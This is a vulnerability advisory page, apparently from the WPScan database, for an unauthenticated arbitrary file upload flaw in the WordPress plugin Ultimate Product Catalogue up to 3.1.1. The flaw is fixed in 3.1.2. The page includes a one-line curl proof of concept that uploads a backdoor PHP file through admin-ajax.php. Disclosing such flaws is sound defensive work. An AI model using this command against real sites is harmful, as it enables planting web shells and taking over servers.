Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload

Sign up to our free email alerts service for instant vulnerability notifications!

Description
By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the web server process.
Proof of Concept
curl -v -k -X POST -F "Products_Spreadsheet=@./backdoor.php" "www.example.com/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet"

Affects

Plugin ultimate-product-catalogue
fixed in version 3.1.2

References

URL http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Luca Ercoli
Submitter Website http://blog.seeweb.it/
Submitter Twitter seeweblive
Views 199
Verified No
WPVDB ID 7939

Timeline

Publicly Published 2015-04-22 (over 1 year ago)
Added 2015-04-26 (over 1 year ago)
Last Updated 2016-07-29 (4 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.